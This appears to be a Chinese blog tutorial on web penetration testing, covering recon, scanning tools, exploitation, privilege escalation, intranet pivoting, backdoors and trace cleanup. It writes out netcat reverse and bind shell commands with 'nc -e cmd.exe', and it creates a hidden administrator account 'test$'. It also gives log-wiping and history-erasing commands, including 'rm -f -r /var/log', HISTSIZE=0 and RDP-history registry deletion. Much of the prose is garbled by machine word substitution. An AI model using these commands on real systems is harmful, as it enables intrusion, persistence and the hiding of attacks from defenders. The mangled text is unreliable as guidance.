2020年教你从网站安全新手到渗透测试工程师的锐变过程

Web渗透测试分成白盒测试和黑盒测试,白盒测试就是指总体目标企业网站的源代码等信息内容的状况下对其渗入,等于编码解析财务审计。而黑盒测试则是在对该网站程序信息内容不知道的状况下渗入,下列常说的Web渗入就是说黑盒渗入。Web渗入分成下列好多个流程,信息内容搜集,漏洞扫描系统,漏洞利用,提权,内部网渗入,留后门,清理痕迹。一般的渗入构思就是说看是不是有引入系统漏洞,随后引入获得后台管理管理人员账户密码,登陆后台管理,提交小龙,再根据小马上传马来西亚,提权,内部网分享,开展内部网渗入,扫描仪内部网c段生存服务器及对外开放端口号,看其服务器有没法运用系统漏洞(nessus)端口号(nmap)相匹配服务项目及将会存有的系统漏洞,对其运用(msf)拿到内部网,留有后门,清理痕迹。或是看是不是有文件上传的地区,提交一句话木马,再用水果刀连接,取得数据库查询并可实行cmd指令,可再次上马来西亚………构思许多,许多那时候成失败将会就是说一个构思的难题,技术性能够不高,构思一定得骚。

信息内容搜集信息内容搜集是全部步骤的头等大事,早期信息内容搜集的越大,Web渗入的通过率就会越高。DNS域名信息:根据url获得其真正ip,二级域名(Layer二级域名工程爆破机),旁站(K8旁站,御剑1.5),c段,企业网站责任人以及信息内容(whois查寻)整站源码信息内容:网络服务器电脑操作系统、网络服务器种类及版本号(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本制作种类(php/jsp/asp/aspx)、CMS种类;企业网站普遍配搭为:ASP和ASPX:ACCESS、SQLServerPHP:MySQL、PostgreSQLJSP:Oracle、MySQL比较敏感文件目录信息内容(御剑,dirbust)对外开放端口号信息内容(nmp)

漏洞扫描系统运用AWVS,AppScan,OWASP-ZAP,等可对企业网站开展企业网站系统漏洞的基本扫描仪,看其是不是有可运用系统漏洞。普遍系统漏洞:SQL引入XSS跨站脚本制作CSRF跨站恳求仿冒XXE(XML外界实体线引入)系统漏洞SSRF(服务器端恳求仿冒)系统漏洞文档包括系统漏洞上传文件系统漏洞文档分析系统漏洞远程控制程序运行系统漏洞CORS跨域共享资源系统漏洞滥用权力浏览系统漏洞文件目录遍历系统漏洞和随意文档载入/免费下载系统漏洞

漏洞利用用专用工具也罢哪些也罢对相对系统漏洞开展运用如:Sql引入(sqlmap)XSS(BEEF)后台管理登陆密码工程爆破(burp)端口号工程爆破(hydra)

提权得到shell以后我们管理权限将会很低,因而要对自身提权,能够依据网络服务器版本号相匹配的exp开展提权,针对Windows系统软件也可以看其补丁下载相匹配系统漏洞的exp开展提权

内部网渗入最先开展端口转发能用ncnc操作方法:反方向联接在内网ip服务器上开展监视:nc-lvp4444以内网服务器上实行:nc-ecmd.exe内网ip服务器ip4444取得成功以后就可以获得一个内部网服务器shell顺向联接远程控制服务器上实行:nc-l-p4444-t-ecmd.exe当地服务器上实行:nc-vv远程控制服务器ip4444取得成功后,当地服务器就可以远程控制服务器的一个shell随后就是说对里网开展渗入了,能够用服务器漏洞扫描工具(nessus,x-scan等)开展扫描仪看是不是有能用系统漏洞,能用msf开展运用,或是用nmap扫描仪生存服务器及对外开放端口号,能用hydra开展端口号工程爆破或是用msf对端口号相匹配系统漏洞获得shell拿到内部网留后门

网站安全公司对留后门针对企业网站提交一句话木马,留有后门针对windows客户能用hideadmin建立一个非常掩藏帐户手工制作:netusertest$123456/addnetlocalgroupadministratorstest$/add那样的话在cmd指令中看不见,但在操作面板能够看见,还必须改注册表才可以保持操纵版块也看不见,太过不便,很少过多阐释,因此還是用专用工具放心省劲。

痕迹清理系统日志清除:在win自然环境下得话用msf清除,指令以下:runclearlogsclearev假如在Liunx自然环境下:rm-f-r/var/log删掉/var/log下的文档exportHISTSIZE=0exportHISTSIZE=0删掉bashshell储存的最终500条指令3389远程登陆纪录消除:@echooff@regdelete“HKEY_CURRENT_USER\Software\Microsoft\TerminalServerClient\Default”/va/f@del”%USERPROFILE%\MyDocuments\Default.rdp”/a@exit此外在渗入时尽可能用代理商以防随便的暴露ip。自己呢,都是个刚入安全性圈的菜鸡,左右是在学习培训中对渗入全过程的一点小结,大神勿喷,期望能够帮上这些不久新手入门的网络信息安全发烧友。

有关训练渗入综合性情景应急演练:运用自身学习培训到的专业知识对总体目标开展渗透测试,获得总体目标系统软件的管理权限,进而获得比较敏感信息内容,那麼恭喜恭喜,你早已进行了从网站安全新手到渗透测试技术工程师的成长。